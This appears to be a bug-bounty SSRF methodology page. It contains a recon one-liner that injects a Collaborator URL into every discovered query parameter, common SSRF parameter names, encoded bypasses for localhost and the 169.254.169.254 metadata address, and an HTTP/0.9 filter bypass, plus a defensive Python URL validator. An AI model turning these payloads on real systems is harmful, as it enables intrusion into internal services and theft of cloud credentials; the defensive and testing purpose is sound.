🚁My SSRF Methodology

SSRF Payload Generator

----------------------------------------------------------------

(1) One-liner SSRF finding

findomain -t testphp.vulnweb.com -q | /root/go/bin/httpx -silent -threads 1000 | /root/go/bin/gau | grep "=" | /root/go/bin/qsreplace http://YourBurpCollaborator.net

(findomain -q prints only the discovered subdomains, httpx keeps the ones that answer over HTTP, gau pulls their archived URLs, grep "=" keeps URLs that carry query parameters, and qsreplace swaps every parameter value for your Collaborator URL, so any out-of-band hit points at a parameter worth testing.)

----------------------------------------------------------------

Top 10 SSRF parameters

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?site={target}

----------------------------------------------------------------

SSRF bypass list for localhost (127.0.0.1):

http://127.1/ (inet_aton shorthand: the last component fills the remaining bytes)
http://0000::1:80/ (IPv6 loopback with leading zeros)
http://[::]:80/ (IPv6 unspecified address, usually delivered to the local host)
http://2130706433/ (the address as a single decimal integer)
http://whitelisted@127.0.0.1 (an allow-listed name in the userinfo part, host is still 127.0.0.1)
http://0x7f000001/ (hex)
http://017700000001 (octal integer)
http://0177.00.00.01 (dotted octal)

Using a redirect to localhost will also often work.

----------------------------------------------------------------

Tips: Server-Side Request Forgery (SSRF)

Use URLs with embedded credentials (e.g. http://user:pass@target.com) to log in to internal HTTP services when exploiting an SSRF vulnerability.

----------------------------------------------------------------

Did you find the SSRF, but http://169.254.169.254/ is blacklisted? Try http://0xA9FEA9FE/ or http://0251.0376.0251.0376/ (the same address written in hex and in dotted octal).
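Every entry in the localhost bypass list, the embedded-credentials trick and the hex/octal spellings of 169.254.169.254 defeat filters that compare the raw URL string. As an added defender-side example (not part of this methodology page), the Python validator below normalises each spelling to a canonical address the way inet_aton does, then checks the address class; the names `check_url`, `ip_literal`, `parse_legacy_ipv4` and the `resolver` hook are my own.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

def _part(p):  # one dotted component, inet_aton rules: 0x.. is hex, a leading 0 is octal, else decimal
    if p[:2].lower() == "0x":
        return int(p[2:], 16)
    return int(p, 8) if len(p) > 1 and p[0] == "0" else int(p)

def parse_legacy_ipv4(host):
    """Integer for inet_aton shorthand (127.1, 2130706433, 0x7f000001, 017700000001, 0177.00.00.01), else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        vals = [_part(p) for p in parts]
    except ValueError:
        return None
    if any(v > 255 for v in vals[:-1]) or vals[-1] >= 1 << (8 * (5 - len(parts))):
        return None   # the last component fills every remaining byte, so 127.1 == 127.0.0.1
    return sum(v << (8 * (3 - i)) for i, v in enumerate(vals[:-1])) + vals[-1]

def ip_literal(host):  # canonical address for any literal form in the bypass list; None for a DNS name
    if ":" not in host:                    # IPv4 in any inet_aton spelling (ipaddress alone rejects 127.1)
        n = parse_legacy_ipv4(host)
        return ipaddress.IPv4Address(n) if n is not None else None
    try:
        ip = ipaddress.IPv6Address(host)   # 0000::1 -> ::1; urlsplit already stripped the brackets of [::]
    except ValueError:
        return None
    return ip.ipv4_mapped or ip            # ::ffff:a.b.c.d unwraps to its IPv4 address

def is_blocked(ip):  # 169.254.169.254 is link-local, so its hex and octal spellings fail here too
    return (ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified
            or ip.is_reserved or ip.is_multicast)

def check_url(url, resolver=None):
    """Decide whether a user-supplied URL may be fetched server-side; returns (allowed, reason). Re-run on
    every redirect Location before following it, and connect to the checked IP, not a re-resolved name."""
    resolver = resolver or (lambda h: [a[4][0] for a in socket.getaddrinfo(h, None)])
    u = urlsplit(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return False, "scheme not allowed or host missing"
    if u.username is not None or u.password is not None:   # user:pass@ and whitelisted@host forms
        return False, "credentials in URL"
    ip = ip_literal(u.hostname)
    targets = [ip] if ip is not None else [ip_literal(a) for a in resolver(u.hostname)]
    if not targets or any(t is None or is_blocked(t) for t in targets):
        return False, "internal or unresolvable address"
    return True, "ok"
```

Pass your own `resolver(host) -> [ip strings]` to pin results or to test offline; the default resolves with socket.getaddrinfo.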

----------------------------------------------------------------

When testing for SSRF, change the HTTP version from 1.1 to HTTP/0.9 and remove the Host header completely. This has bypassed several SSRF fixes in the past.

----------------------------------------------------------------